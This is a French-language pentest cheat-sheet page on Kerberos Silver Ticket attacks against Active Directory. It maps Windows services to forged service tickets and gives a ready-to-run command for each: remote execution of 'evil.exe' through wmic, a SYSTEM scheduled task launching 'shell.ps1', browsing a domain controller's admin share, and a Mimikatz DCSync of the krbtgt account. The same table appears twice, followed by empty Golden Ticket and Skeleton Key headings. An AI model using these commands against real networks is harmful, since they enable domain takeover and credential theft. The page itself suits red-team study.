Silver Ticket

Service à cibler lors de demande de TGS : 
Type de service
Service Silver Ticket
Attaques
SWMI
HOST + RPCSS
wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"
Powershell Remoting
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
WinRM
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
Scheduled Tasks
HOST
schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"
Windows File Share (CIFS)
CIFS
dir \dc01\c$
LDAP operations including Mimikatz DCSync
LDAP
lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt
Windows Remote Server Administration Tools
RPCSS + LDAP + CIFS
​

Type de service	Service Silver Ticket	Attaques
SWMI	HOST + RPCSS	`wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"`
Powershell Remoting	HTTP + WSMAN	`New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC`
WinRM	HTTP + WSMAN	`New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC`
Scheduled Tasks	HOST	`schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"`
Windows File Share (CIFS)	CIFS	`dir \dc01\c$`
LDAP operations including Mimikatz DCSync	LDAP	`lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt`
Windows Remote Server Administration Tools	RPCSS + LDAP + CIFS

Golden Ticket

Skeleton Key

Dernière mise à jour 1yr ago